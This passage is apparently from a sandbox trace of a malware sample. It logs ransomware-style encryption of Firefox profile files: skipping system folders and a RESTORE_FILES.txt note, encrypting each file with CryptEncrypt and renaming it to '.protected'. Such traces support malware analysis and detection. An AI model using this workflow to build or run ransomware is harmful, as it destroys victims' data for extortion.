lpSrch=".txt") returned 0x0 [0090.775] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock") returned 103 [0090.775] StrStrW (lpFirst="parent.lock", lpSrch=".rar") returned 0x0 [0090.775] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock") returned 103 [0090.775] StrStrW (lpFirst="parent.lock", lpSrch=".zip") returned 0x0 [0090.775] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0090.775] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.775] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0090.775] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.775] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0090.776] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0090.776] CloseHandle (hObject=0x154) returned 1 [0090.776] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock.protected") returned 113 
[0090.776] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\parent.lock"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\parent.lock.protected")) returned 1 [0090.777] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.777] lstrcmpiW (lpString1="permissions.sqlite", lpString2="Windows") returned -1 [0090.777] lstrcmpiW (lpString1="permissions.sqlite", lpString2="Program Files") returned -1 [0090.777] lstrcmpiW (lpString1="permissions.sqlite", lpString2="Program Files (x86)") returned -1 [0090.777] lstrcmpiW (lpString1="permissions.sqlite", lpString2="$Recycle.bin") returned 1 [0090.777] lstrcmpiW (lpString1="permissions.sqlite", lpString2="System Volume Information") returned -1 [0090.777] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite") returned 110 [0090.777] StrStrIW (lpFirst="permissions.sqlite", lpSrch=".protected") returned 0x0 [0090.777] lstrcmpW (lpString1="permissions.sqlite", lpString2="RESTORE_FILES.txt") returned -1 [0090.777] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.777] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.777] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\permissions.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.778] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite") returned 110 [0090.778] StrStrW (lpFirst="permissions.sqlite", lpSrch=".txt") returned 0x0 [0090.778] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite") returned 110 [0090.778] StrStrW (lpFirst="permissions.sqlite", lpSrch=".rar") returned 0x0 [0090.778] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite") returned 110 [0090.778] StrStrW (lpFirst="permissions.sqlite", lpSrch=".zip") returned 0x0 [0090.778] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0090.788] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.788] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0090.788] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.788] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, 
lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0090.789] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0090.789] CloseHandle (hObject=0x154) returned 1 [0090.789] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite.protected") returned 120 [0090.789] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\permissions.sqlite"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\permissions.sqlite.protected")) returned 1 [0090.790] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.790] lstrcmpiW (lpString1="places.sqlite", lpString2="Windows") returned -1 [0090.790] lstrcmpiW (lpString1="places.sqlite", lpString2="Program Files") returned -1 [0090.790] lstrcmpiW (lpString1="places.sqlite", lpString2="Program Files (x86)") returned -1 [0090.790] lstrcmpiW (lpString1="places.sqlite", lpString2="$Recycle.bin") returned 1 [0090.790] lstrcmpiW (lpString1="places.sqlite", lpString2="System Volume Information") returned -1 [0090.790] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite") returned 105 [0090.790] StrStrIW (lpFirst="places.sqlite", lpSrch=".protected") returned 0x0 [0090.790] lstrcmpW (lpString1="places.sqlite", lpString2="RESTORE_FILES.txt") returned -1 [0090.790] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.790] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.790] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\places.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.791] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite") returned 105 [0090.791] StrStrW (lpFirst="places.sqlite", lpSrch=".txt") returned 0x0 [0090.791] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite") returned 105 [0090.791] StrStrW (lpFirst="places.sqlite", lpSrch=".rar") returned 0x0 [0090.791] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite") returned 105 [0090.791] StrStrW (lpFirst="places.sqlite", lpSrch=".zip") returned 0x0 [0090.791] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0090.793] 
SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.793] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0090.793] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.793] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0090.909] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0090.909] CloseHandle (hObject=0x154) returned 1 [0090.909] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite.protected") returned 115 [0090.909] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\places.sqlite"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\places.sqlite.protected")) returned 1 [0090.910] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 
[0090.910] lstrcmpiW (lpString1="pluginreg.dat", lpString2="Windows") returned -1 [0090.910] lstrcmpiW (lpString1="pluginreg.dat", lpString2="Program Files") returned -1 [0090.910] lstrcmpiW (lpString1="pluginreg.dat", lpString2="Program Files (x86)") returned -1 [0090.910] lstrcmpiW (lpString1="pluginreg.dat", lpString2="$Recycle.bin") returned 1 [0090.910] lstrcmpiW (lpString1="pluginreg.dat", lpString2="System Volume Information") returned -1 [0090.910] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat") returned 105 [0090.910] StrStrIW (lpFirst="pluginreg.dat", lpSrch=".protected") returned 0x0 [0090.910] lstrcmpW (lpString1="pluginreg.dat", lpString2="RESTORE_FILES.txt") returned -1 [0090.910] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.910] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.910] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\pluginreg.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.911] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat") returned 105 [0090.911] StrStrW (lpFirst="pluginreg.dat", lpSrch=".txt") returned 0x0 [0090.911] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat") 
returned 105 [0090.911] StrStrW (lpFirst="pluginreg.dat", lpSrch=".rar") returned 0x0 [0090.911] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat") returned 105 [0090.911] StrStrW (lpFirst="pluginreg.dat", lpSrch=".zip") returned 0x0 [0090.911] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0xe14, lpOverlapped=0x0) returned 1 [0090.913] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffff1ec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.913] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0xe14, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0xe14, lpOverlapped=0x0) returned 1 [0090.913] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.913] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0090.913] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0090.913] CloseHandle (hObject=0x154) returned 1 [0090.913] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat.protected") returned 115 [0090.914] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\pluginreg.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\pluginreg.dat.protected")) returned 1 [0090.914] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.914] lstrcmpiW (lpString1="prefs.js", lpString2="Windows") returned -1 [0090.914] lstrcmpiW (lpString1="prefs.js", lpString2="Program Files") returned -1 [0090.914] lstrcmpiW (lpString1="prefs.js", lpString2="Program Files (x86)") returned -1 [0090.914] lstrcmpiW (lpString1="prefs.js", lpString2="$Recycle.bin") returned 1 [0090.914] lstrcmpiW (lpString1="prefs.js", lpString2="System Volume Information") returned -1 [0090.914] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js") returned 100 [0090.915] StrStrIW (lpFirst="prefs.js", lpSrch=".protected") returned 0x0 [0090.915] lstrcmpW (lpString1="prefs.js", lpString2="RESTORE_FILES.txt") returned -1 [0090.915] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.915] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.915] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\prefs.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.916] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js") returned 100 [0090.916] StrStrW (lpFirst="prefs.js", lpSrch=".txt") returned 0x0 [0090.916] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js") returned 100 [0090.916] StrStrW (lpFirst="prefs.js", lpSrch=".rar") returned 0x0 [0090.916] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js") returned 100 [0090.916] StrStrW (lpFirst="prefs.js", lpSrch=".zip") returned 0x0 [0090.916] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0xfde, lpOverlapped=0x0) returned 1 [0090.917] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffff022, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.917] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0xfde, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0xfde, lpOverlapped=0x0) returned 1 [0090.918] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.918] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0090.918] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, 
nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0090.918] CloseHandle (hObject=0x154) returned 1 [0090.918] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js.protected") returned 110 [0090.919] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\prefs.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\prefs.js.protected")) returned 1 [0090.919] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.919] lstrcmpiW (lpString1="search.json", lpString2="Windows") returned -1 [0090.919] lstrcmpiW (lpString1="search.json", lpString2="Program Files") returned 1 [0090.919] lstrcmpiW (lpString1="search.json", lpString2="Program Files (x86)") returned 1 [0090.919] lstrcmpiW (lpString1="search.json", lpString2="$Recycle.bin") returned 1 [0090.920] lstrcmpiW (lpString1="search.json", lpString2="System Volume Information") returned -1 [0090.920] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json") returned 103 [0090.920] StrStrIW (lpFirst="search.json", lpSrch=".protected") returned 0x0 [0090.920] lstrcmpW (lpString1="search.json", lpString2="RESTORE_FILES.txt") returned 1 [0090.920] CryptGenRandom (in: 
hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.920] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.920] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\search.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.921] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json") returned 103 [0090.921] StrStrW (lpFirst="search.json", lpSrch=".txt") returned 0x0 [0090.921] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json") returned 103 [0090.921] StrStrW (lpFirst="search.json", lpSrch=".rar") returned 0x0 [0090.921] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json") returned 103 [0090.921] StrStrW (lpFirst="search.json", lpSrch=".zip") returned 0x0 [0090.921] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0090.923] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.923] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, 
lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0090.923] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.924] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0090.924] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0090.924] CloseHandle (hObject=0x154) returned 1 [0090.924] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json.protected") returned 113 [0090.924] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json" (normalized: "c:\\users\\5p5nrgjn0js 